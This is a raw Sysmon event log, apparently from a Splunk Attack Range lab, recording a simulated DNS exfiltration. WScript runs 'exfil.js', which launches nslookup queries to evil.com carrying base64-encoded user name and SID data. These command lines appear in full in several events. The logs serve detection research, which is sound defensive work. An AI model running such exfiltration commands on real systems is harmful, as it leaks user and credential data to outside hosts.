AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52384-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044798Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:30.096{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D82F53D318C1FA6325ED018CEFF63D61,SHA256=721826708B9B68995ADDC6481D8FF780C53EBBF671F1F998EEF449598E5D2753,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000209040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-50652-false127.0.0.1-53domain 354300x8000000000000000209039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.468{00000000-0000-0000-0000-000000000000}7224<unknown process>-udpfalsefalse127.0.0.1-50651-false127.0.0.1-53domain 10341000x8000000000000000209038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-18EB-629A-AC43-000000005F02}78646436C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-AD43-000000005F02}6068C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-AD43-000000005F02}6068C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.980{2E1864BB-18EB-629A-AB43-000000005F02}21322428C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-AD43-000000005F02}6068C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.990{2E1864BB-18EB-629A-AD43-000000005F02}6068C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-AB43-000000005F02}2132C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqlwwm.tmp 2>&1 10341000x8000000000000000209030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.959{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-AC43-000000005F02}7864C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.959{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-AC43-000000005F02}7864C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.959{2E1864BB-18EB-629A-AC43-000000005F02}78646436C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-AB43-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.959{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-AC43-000000005F02}7864C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-AB43-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-18E0-629A-6742-000000005F02}39765480C:\Windows\System32\WScript.exe{2E1864BB-18EB-629A-AB43-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.953{2E1864BB-18EB-629A-AB43-000000005F02}2132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqlwwm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.943{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsacxvct.tmpMD5=FB87DC05AA42B3CEFD4C629E53F524B0,SHA256=D8FD32DBA2A6AFDF9B6B8FFC9EECC534FF5A98DB8AFE74AF80C8BC0F2B8F0CBD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-18EB-629A-A943-000000005F02}50125384C:\Windows\system32\conhost.exe{2E1864BB-18EB-629A-AA43-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EB-629A-AA43-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.928{2E1864BB-18EB-629A-A843-000000005F02}75087280C:\Windows\system32\cmd.exe{2E1864BB-18EB-629A-AA43-000000005F02}7260C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.930{2E1864BB-18EB-629A-AA43-000000005F02}7260C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EB-629A-A843-000000005F02}7508C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsacxvct.tmp 2>&1 10341000x8000000000000000209010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.912{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A943-000000005F02}5012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.912{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EB-629A-A943-000000005F02}5012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 